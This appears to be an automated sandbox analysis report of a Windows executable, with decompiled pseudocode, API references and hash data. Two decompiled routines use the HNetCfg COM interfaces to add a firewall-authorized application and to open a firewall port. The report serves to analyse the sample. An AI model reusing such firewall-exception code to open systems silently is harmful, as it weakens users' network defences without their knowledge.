• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: CreateInstance
• String ID:
                                                                                                                                                • API String ID: 542301482-0
                                                                                                                                                • Opcode ID: 62b3a639891b0965832d63fac4681c0c28bce31ef7568a7f11fbd3d2da603de0
                                                                                                                                                • Instruction ID: 8f1aa189a019f2210634f44ab17fad987faee06bf970ed2e5952b1e561b10ca6
                                                                                                                                                • Opcode Fuzzy Hash: 62b3a639891b0965832d63fac4681c0c28bce31ef7568a7f11fbd3d2da603de0
                                                                                                                                                • Instruction Fuzzy Hash: 18B0923078030876DD101A404E4FF297A966B40F00F210880B300270E386E20054D601
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00BF3148() {
	void* _t1;

	_t1 = E00BF30D6(0); // executed
	return _t1;
}

Addresses: 0x00bf314a, 0x00bf3150

APIs
• __encode_pointer.LIBCMT ref: 00BF314A
  • Part of subcall function 00BF30D6: TlsGetValue.KERNEL32(00000000,?,00BF314F,00000000,00BF5F7B,00C00398,00000000,00000314,?,00BF3A4C,00C00398,Microsoft Visual C++ Runtime Library,00012010), ref: 00BF30E8
  • Part of subcall function 00BF30D6: TlsGetValue.KERNEL32(00000004,?,00BF314F,00000000,00BF5F7B,00C00398,00000000,00000314,?,00BF3A4C,00C00398,Microsoft Visual C++ Runtime Library,00012010), ref: 00BF30FF
  • Part of subcall function 00BF30D6: RtlEncodePointer.NTDLL(00000000,?,00BF314F,00000000,00BF5F7B,00C00398,00000000,00000314,?,00BF3A4C,00C00398,Microsoft Visual C++ Runtime Library,00012010), ref: 00BF313D
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: Value$EncodePointer__encode_pointer
• String ID:
• API String ID: 2585649348-0
• Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
• Instruction ID: 444f2fa950e508e53b1bf2218ab4ae057267362edb91bb971e30f8ece5a6cb13
• Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
• Instruction Fuzzy Hash:
Uniqueness
Uniqueness Score: -1.00%
Non-executed Functions

C-Code - Quality: 85%
E00BF1C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
	intOrPtr _v0;
	void* _v804;
	intOrPtr _v808;
	intOrPtr _v812;
	intOrPtr _t6;
	intOrPtr _t11;
	intOrPtr _t12;
	intOrPtr _t13;
	long _t17;
	intOrPtr _t21;
	intOrPtr _t22;
	intOrPtr _t25;
	intOrPtr _t26;
	intOrPtr _t27;
	intOrPtr* _t31;
	void* _t34;

	_t27 = __esi;
	_t26 = __edi;
	_t25 = __edx;
	_t22 = __ecx;
	_t21 = __ebx;
	_t6 = __eax;
	_t34 = _t22 -  *0xbff008; // 0xf1c81c65
	if(_t34 == 0) {
		asm("repe ret");
	}
	 *0xc00128 = _t6;
	 *0xc00124 = _t22;
	 *0xc00120 = _t25;
	 *0xc0011c = _t21;
	 *0xc00118 = _t27;
	 *0xc00114 = _t26;
	 *0xc00140 = ss;
	 *0xc00134 = cs;
	 *0xc00110 = ds;
	 *0xc0010c = es;
	 *0xc00108 = fs;
	 *0xc00104 = gs;
	asm("pushfd");
	_pop( *0xc00138);
	 *0xc0012c =  *_t31;
	 *0xc00130 = _v0;
	 *0xc0013c =  &_a4;
	 *0xc00078 = 0x10001;
	_t11 =  *0xc00130; // 0x0
	 *0xc0002c = _t11;
	 *0xc00020 = 0xc0000409;
	 *0xc00024 = 1;
	_t12 =  *0xbff008; // 0xf1c81c65
	_v812 = _t12;
	_t13 =  *0xbff00c; // 0xe37e39a
	_v808 = _t13;
	 *0xc00070 = IsDebuggerPresent();
	_push(1);
	E00BF4E10(_t14);
	SetUnhandledExceptionFilter(0);
	_t17 = UnhandledExceptionFilter(0xbfc1b4);
	if( *0xc00070 == 0) {
		_push(1);
		E00BF4E10(_t17);
	}
	return TerminateProcess(GetCurrentProcess(), 0xc0000409);
}

Addresses: 0x00bf1c57, 0x00bf1c57, 0x00bf1c57, 0x00bf1c57, 0x00bf1c57, 0x00bf1c57, 0x00bf1c57, 0x00bf1c5d, 0x00bf1c5f, 0x00bf1c5f,
0x00bf24f7, 0x00bf24fc, 0x00bf2502, 0x00bf2508, 0x00bf250e, 0x00bf2514, 0x00bf251a, 0x00bf2521, 0x00bf2528, 0x00bf252f,
0x00bf2536, 0x00bf253d, 0x00bf2544, 0x00bf2545, 0x00bf254e, 0x00bf2556, 0x00bf255e, 0x00bf2569, 0x00bf2573, 0x00bf2578,
0x00bf257d, 0x00bf2587, 0x00bf2591, 0x00bf2596, 0x00bf259c, 0x00bf25a1, 0x00bf25ad, 0x00bf25b2, 0x00bf25b4, 0x00bf25bc,
0x00bf25c7, 0x00bf25d4, 0x00bf25d6, 0x00bf25d8, 0x00bf25dd, 0x00bf25f1

APIs
• IsDebuggerPresent.KERNEL32 ref: 00BF25A7
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BF25BC
• UnhandledExceptionFilter.KERNEL32(00BFC1B4), ref: 00BF25C7
• GetCurrentProcess.KERNEL32(C0000409), ref: 00BF25E3
• TerminateProcess.KERNEL32(00000000), ref: 00BF25EA
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: a0967259ee251276ee73c1469385fe619f9e872899f7485baca382cff85316e7
• Instruction ID: 9589db6283cfab4f253e084cf594ba80983e256b781a501c566a02c914f96e9d
• Opcode Fuzzy Hash: a0967259ee251276ee73c1469385fe619f9e872899f7485baca382cff85316e7
• Instruction Fuzzy Hash: CC21BDB4801208DFD741DF68F985B6C3BF4FB08715F23415AE64887262EBB05A99CF59
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                			E00BF17BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				char _v24;
                                                                                                                                                				void* _v28;
                                                                                                                                                				void* _v32;
                                                                                                                                                				void* _v36;
                                                                                                                                                				void* _v40;
                                                                                                                                                				void* _v44;
                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				signed int _t54;
                                                                                                                                                				void* _t59;
                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                				intOrPtr* _t61;
                                                                                                                                                				intOrPtr* _t62;
                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                				intOrPtr* _t64;
                                                                                                                                                				void* _t74;
                                                                                                                                                				intOrPtr* _t75;
                                                                                                                                                				void* _t76;
                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                				void* _t78;
                                                                                                                                                				void* _t80;
                                                                                                                                                				void* _t83;
                                                                                                                                                				intOrPtr* _t90;
                                                                                                                                                				intOrPtr* _t92;
                                                                                                                                                				intOrPtr* _t94;
                                                                                                                                                				intOrPtr* _t96;
                                                                                                                                                				void* _t97;
                                                                                                                                                				intOrPtr* _t98;
                                                                                                                                                				intOrPtr* _t100;
                                                                                                                                                				signed int _t120;
                                                                                                                                                
                                                                                                                                                				_t115 = __edx;
                                                                                                                                                				_t54 =  *0xbff008; // 0xf1c81c65
                                                                                                                                                				_v8 = _t54 ^ _t120;
                                                                                                                                                				_v52 = _a4;
                                                                                                                                                				_v48 = _a8;
                                                                                                                                                				__imp__CoInitialize(0);
                                                                                                                                                				_v36 = 0;
                                                                                                                                                				_v32 = 0;
                                                                                                                                                				_v40 = 0;
                                                                                                                                                				_v44 = 0;
                                                                                                                                                				_v28 = 0;
                                                                                                                                                				_t59 = E00BF80F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                				__imp__CLSIDFromProgID(_t59,  &_v24);
                                                                                                                                                				_t117 = _t59;
                                                                                                                                                				if(_t59 >= 0) {
                                                                                                                                                					_t100 = __imp__CoCreateInstance;
                                                                                                                                                					_t74 =  *_t100( &_v24, 0, 5, 0xbfc17c,  &_v36);
                                                                                                                                                					_t117 = _t74;
                                                                                                                                                					if(_t74 >= 0) {
                                                                                                                                                						_t75 = _v36;
                                                                                                                                                						_t115 =  &_v32;
                                                                                                                                                						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
                                                                                                                                                						_t117 = _t76;
                                                                                                                                                						if(_t76 >= 0) {
                                                                                                                                                							_t77 = _v32;
                                                                                                                                                							_t115 =  &_v40;
                                                                                                                                                							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
                                                                                                                                                							_t117 = _t78;
                                                                                                                                                							if(_t78 >= 0) {
                                                                                                                                                								_t80 = E00BF80F0( &_v40, "HNetCfg.FwAuthorizedApplication");
                                                                                                                                                								__imp__CLSIDFromProgID(_t80,  &_v24);
                                                                                                                                                								_t117 = _t80;
                                                                                                                                                								if(_t80 >= 0) {
                                                                                                                                                									_t83 =  *_t100( &_v24, 0, 5, 0xbfc17c,  &_v28);
                                                                                                                                                									_t117 = _t83;
                                                                                                                                                									if(_t83 >= 0) {
                                                                                                                                                										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E00BF80F0( &_v40, _v48));
                                                                                                                                                										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00BF80F0(_t115, _v52));
                                                                                                                                                										_t90 = _v28;
                                                                                                                                                										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
                                                                                                                                                										_t92 = _v28;
                                                                                                                                                										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
                                                                                                                                                										_t94 = _v28;
                                                                                                                                                										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
                                                                                                                                                										_t96 = _v40;
                                                                                                                                                										_t115 =  &_v44;
                                                                                                                                                										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
                                                                                                                                                										_t117 = _t97;
                                                                                                                                                										if(_t97 >= 0) {
                                                                                                                                                											_t98 = _v44;
                                                                                                                                                											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t60 = _v28;
                                                                                                                                                				if(_t60 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t60 + 8))(_t60);
                                                                                                                                                				}
                                                                                                                                                				_t61 = _v44;
                                                                                                                                                				if(_t61 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                                                                                                                				}
                                                                                                                                                				_t62 = _v40;
                                                                                                                                                				if(_t62 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                				}
                                                                                                                                                				_t63 = _v32;
                                                                                                                                                				if(_t63 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t63 + 8))(_t63);
                                                                                                                                                				}
                                                                                                                                                				_t64 = _v36;
                                                                                                                                                				if(_t64 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t64 + 8))(_t64);
                                                                                                                                                				}
                                                                                                                                                				__imp__CoUninitialize();
                                                                                                                                                				return E00BF1C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
                                                                                                                                                			}

                                                                                                                                                0x00bf17be
                                                                                                                                                0x00bf17c4
                                                                                                                                                0x00bf17cb
                                                                                                                                                0x00bf17d4
                                                                                                                                                0x00bf17dd
                                                                                                                                                0x00bf17e0
                                                                                                                                                0x00bf17ef
                                                                                                                                                0x00bf17f2
                                                                                                                                                0x00bf17f5
                                                                                                                                                0x00bf17f8
                                                                                                                                                0x00bf17fb
                                                                                                                                                0x00bf17fe
                                                                                                                                                0x00bf1804
                                                                                                                                                0x00bf180a
                                                                                                                                                0x00bf180e
                                                                                                                                                0x00bf1814
                                                                                                                                                0x00bf182a
                                                                                                                                                0x00bf182c
                                                                                                                                                0x00bf1830
                                                                                                                                                0x00bf1836
                                                                                                                                                0x00bf183b
                                                                                                                                                0x00bf1840
                                                                                                                                                0x00bf1843
                                                                                                                                                0x00bf1847
                                                                                                                                                0x00bf184d
                                                                                                                                                0x00bf1852
                                                                                                                                                0x00bf1857
                                                                                                                                                0x00bf185a
                                                                                                                                                0x00bf185e
                                                                                                                                                0x00bf186d
                                                                                                                                                0x00bf1873
                                                                                                                                                0x00bf1879
                                                                                                                                                0x00bf187d
                                                                                                                                                0x00bf1893
                                                                                                                                                0x00bf1895
                                                                                                                                                0x00bf1899
                                                                                                                                                0x00bf18ac
                                                                                                                                                0x00bf18c0
                                                                                                                                                0x00bf18c3
                                                                                                                                                0x00bf18ca
                                                                                                                                                0x00bf18cd
                                                                                                                                                0x00bf18d5
                                                                                                                                                0x00bf18d8
                                                                                                                                                0x00bf18e0
                                                                                                                                                0x00bf18e3
                                                                                                                                                0x00bf18e8
                                                                                                                                                0x00bf18ed
                                                                                                                                                0x00bf18f0
                                                                                                                                                0x00bf18f4
                                                                                                                                                0x00bf18f6
                                                                                                                                                0x00bf1902
                                                                                                                                                0x00bf1902
                                                                                                                                                0x00bf18f4
                                                                                                                                                0x00bf1899
                                                                                                                                                0x00bf187d
                                                                                                                                                0x00bf185e
                                                                                                                                                0x00bf1847
                                                                                                                                                0x00bf1830
                                                                                                                                                0x00bf1904
                                                                                                                                                0x00bf1909
                                                                                                                                                0x00bf190e
                                                                                                                                                0x00bf190e
                                                                                                                                                0x00bf1911

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF17E0
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF17FE
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF1804
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF182A
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF186D
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00BF1873
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF1893
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF18A3
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF18B7
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF1945
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                 • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                • API String ID: 4233194485-1951265404
                                                                                                                                                • Opcode ID: 40537fe304352cea2ff48e317dcb0459122ebbe7abdc422805df80f0d0f85083
                                                                                                                                                • Instruction ID: 0286ce22b821e4f95c3ff56172ec0092bf0b0b473fe6a5e6839034a3181ae370
                                                                                                                                                • Opcode Fuzzy Hash: 40537fe304352cea2ff48e317dcb0459122ebbe7abdc422805df80f0d0f85083
                                                                                                                                                • Instruction Fuzzy Hash: 30512B71A0021D9FCB10DBA8C889DBEBBF9EF88710B144995FA05F7250DB719D46CBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                			E00BF195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				char _v24;
                                                                                                                                                				void* _v28;
                                                                                                                                                				void* _v32;
                                                                                                                                                				void* _v36;
                                                                                                                                                				void* _v40;
                                                                                                                                                				void* _v44;
                                                                                                                                                				char _v48;
                                                                                                                                                				char _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				signed int _t61;
                                                                                                                                                				void* _t66;
                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                				intOrPtr* _t71;
                                                                                                                                                				void* _t81;
                                                                                                                                                				intOrPtr* _t82;
                                                                                                                                                				void* _t83;
                                                                                                                                                				intOrPtr* _t84;
                                                                                                                                                				void* _t85;
                                                                                                                                                				void* _t87;
                                                                                                                                                				void* _t90;
                                                                                                                                                				intOrPtr* _t93;
                                                                                                                                                				intOrPtr* _t95;
                                                                                                                                                				intOrPtr* _t100;
                                                                                                                                                				intOrPtr* _t102;
                                                                                                                                                				intOrPtr* _t104;
                                                                                                                                                				intOrPtr* _t106;
                                                                                                                                                				void* _t107;
                                                                                                                                                				intOrPtr* _t108;
                                                                                                                                                				char _t130;
                                                                                                                                                				signed int _t133;
                                                                                                                                                
                                                                                                                                                				_t128 = __edx;
                                                                                                                                                				_t61 =  *0xbff008; // 0xf1c81c65
                                                                                                                                                				_v8 = _t61 ^ _t133;
                                                                                                                                                				_v56 = _a4;
                                                                                                                                                				_t130 = 0;
                                                                                                                                                				_v60 = _a8;
                                                                                                                                                				__imp__CoInitialize(0);
                                                                                                                                                				_v32 = 0;
                                                                                                                                                				_v44 = 0;
                                                                                                                                                				_v40 = 0;
                                                                                                                                                				_v36 = 0;
                                                                                                                                                				_v28 = 0;
                                                                                                                                                				_t66 = E00BF80F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                				__imp__CLSIDFromProgID(_t66,  &_v24);
                                                                                                                                                				_t110 = _t66;
                                                                                                                                                				if(_t66 >= 0) {
                                                                                                                                                					_t129 = __imp__CoCreateInstance;
                                                                                                                                                					_t81 =  *_t129( &_v24, 0, 5, 0xbfc17c,  &_v32);
                                                                                                                                                					_t110 = _t81;
                                                                                                                                                					if(_t81 >= 0) {
                                                                                                                                                						_t82 = _v32;
                                                                                                                                                						_t128 =  &_v44;
                                                                                                                                                						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
                                                                                                                                                						_t110 = _t83;
                                                                                                                                                						if(_t83 >= 0) {
                                                                                                                                                							_t84 = _v44;
                                                                                                                                                							_t128 =  &_v40;
                                                                                                                                                							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
                                                                                                                                                							_t110 = _t85;
                                                                                                                                                							if(_t85 >= 0) {
                                                                                                                                                								_t87 = E00BF80F0( &_v40, "HNetCfg.FwOpenPort");
                                                                                                                                                								__imp__CLSIDFromProgID(_t87,  &_v24);
                                                                                                                                                								_t110 = _t87;
                                                                                                                                                								if(_t87 >= 0) {
                                                                                                                                                									_t90 =  *_t129( &_v24, 0, 5, 0xbfc17c,  &_v28);
                                                                                                                                                									_t110 = _t90;
                                                                                                                                                									if(_t90 >= 0) {
                                                                                                                                                										_t129 = _v60;
                                                                                                                                                										_v52 = 0;
                                                                                                                                                										_v48 = 0x100;
                                                                                                                                                										if(E00BF1071(_v60,  &_v48,  &_v52) != 0) {
                                                                                                                                                											_t93 = _v28;
                                                                                                                                                											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
                                                                                                                                                											_t95 = _v28;
                                                                                                                                                											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
                                                                                                                                                											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00BF80F0( &_v40, _v56));
                                                                                                                                                											_t100 = _v28;
                                                                                                                                                											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
                                                                                                                                                											_t102 = _v28;
                                                                                                                                                											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
                                                                                                                                                											_t104 = _v28;
                                                                                                                                                											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
                                                                                                                                                											_t106 = _v40;
                                                                                                                                                											_t128 =  &_v36;
                                                                                                                                                											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
                                                                                                                                                											_t110 = _t107;
                                                                                                                                                											if(_t107 >= 0) {
                                                                                                                                                												_t108 = _v36;
                                                                                                                                                												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                										_t130 = 0;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t67 = _v28;
                                                                                                                                                				if(_t67 != _t130) {
                                                                                                                                                					 *((intOrPtr*)( *_t67 + 8))(_t67);
                                                                                                                                                				}
                                                                                                                                                				_t68 = _v36;
                                                                                                                                                				if(_t68 != _t130) {
                                                                                                                                                					 *((intOrPtr*)( *_t68 + 8))(_t68);
                                                                                                                                                				}
                                                                                                                                                				_t69 = _v40;
                                                                                                                                                				if(_t69 != _t130) {
                                                                                                                                                					 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                                                                                                				}
                                                                                                                                                				_t70 = _v44;
                                                                                                                                                				if(_t70 != _t130) {
                                                                                                                                                					 *((intOrPtr*)( *_t70 + 8))(_t70);
                                                                                                                                                				}
                                                                                                                                                				_t71 = _v32;
                                                                                                                                                				if(_t71 != _t130) {
                                                                                                                                                					 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                				}
                                                                                                                                                				__imp__CoUninitialize();
                                                                                                                                                				return E00BF1C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
                                                                                                                                                			}

                                                                                                                                                0x00bf19e1
                                                                                                                                                0x00bf19e5
                                                                                                                                                0x00bf19eb
                                                                                                                                                0x00bf19f0
                                                                                                                                                0x00bf19f5
                                                                                                                                                0x00bf19f8
                                                                                                                                                0x00bf19fc
                                                                                                                                                0x00bf1a0b
                                                                                                                                                0x00bf1a11
                                                                                                                                                0x00bf1a17
                                                                                                                                                0x00bf1a1b
                                                                                                                                                0x00bf1a31
                                                                                                                                                0x00bf1a33
                                                                                                                                                0x00bf1a37
                                                                                                                                                0x00bf1a3d
                                                                                                                                                0x00bf1a43
                                                                                                                                                0x00bf1a4a
                                                                                                                                                0x00bf1a59
                                                                                                                                                0x00bf1a5b
                                                                                                                                                0x00bf1a64
                                                                                                                                                0x00bf1a67
                                                                                                                                                0x00bf1a70
                                                                                                                                                0x00bf1a84
                                                                                                                                                0x00bf1a87
                                                                                                                                                0x00bf1a8f
                                                                                                                                                0x00bf1a92
                                                                                                                                                0x00bf1a9a
                                                                                                                                                0x00bf1a9d
                                                                                                                                                0x00bf1aa5
                                                                                                                                                0x00bf1aa8
                                                                                                                                                0x00bf1aad
                                                                                                                                                0x00bf1ab2
                                                                                                                                                0x00bf1ab5
                                                                                                                                                0x00bf1ab9
                                                                                                                                                0x00bf1abb
                                                                                                                                                0x00bf1ac7
                                                                                                                                                0x00bf1ac7
                                                                                                                                                0x00bf1ab9
                                                                                                                                                0x00bf1ac9
                                                                                                                                                0x00bf1ac9
                                                                                                                                                0x00bf1a37
                                                                                                                                                0x00bf1a1b
                                                                                                                                                0x00bf19fc
                                                                                                                                                0x00bf19e5
                                                                                                                                                0x00bf19ce
                                                                                                                                                0x00bf1acb
                                                                                                                                                0x00bf1ad0
                                                                                                                                                0x00bf1ad5
                                                                                                                                                0x00bf1ad5
                                                                                                                                                0x00bf1ad8
                                                                                                                                                0x00bf1add
                                                                                                                                                0x00bf1ae2
                                                                                                                                                0x00bf1ae2
                                                                                                                                                0x00bf1ae5
                                                                                                                                                0x00bf1aea
                                                                                                                                                0x00bf1aef
                                                                                                                                                0x00bf1aef
                                                                                                                                                0x00bf1af2
                                                                                                                                                0x00bf1af7
                                                                                                                                                0x00bf1afc
                                                                                                                                                0x00bf1afc
                                                                                                                                                0x00bf1aff
                                                                                                                                                0x00bf1b04
                                                                                                                                                0x00bf1b09
                                                                                                                                                0x00bf1b09
                                                                                                                                                0x00bf1b0c
                                                                                                                                                0x00bf1b22

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF197E
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF199C
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF19A2
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF19C8
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1A0B
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00BF1A11
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF1A31
                                                                                                                                                  • Part of subcall function 00BF1071: __wcstoui64.LIBCMT ref: 00BF10DB
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1A7B
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF1B0C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                 • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                • String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
                                                                                                                                                • API String ID: 3570467124-3777566516
